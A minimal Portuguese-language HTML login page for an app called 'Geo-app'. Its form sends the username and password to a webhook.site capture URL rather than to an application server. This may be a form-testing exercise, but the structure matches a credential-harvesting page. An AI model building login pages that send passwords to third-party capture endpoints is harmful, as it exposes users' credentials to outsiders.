<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Geo-app | Login</title>
</head>
<body>
    <div>
        <h3>Login</h3>
        <form action="https://webhook.site/4d5ac6b9-a5d5-4e79-9462-1f59e7fab92d" method="POST">
            <label for="username">Username ou e-mail</label>
            <input id="username" type="text" name="username" placeholder="Digite seu username ou e-mail">
            <label for="password">Senha</label>
            <input id="password" type="password" name="senha" placeholder="Digite sua senha">
            <input type="submit">
        </form>
    </div>
</body>
</html>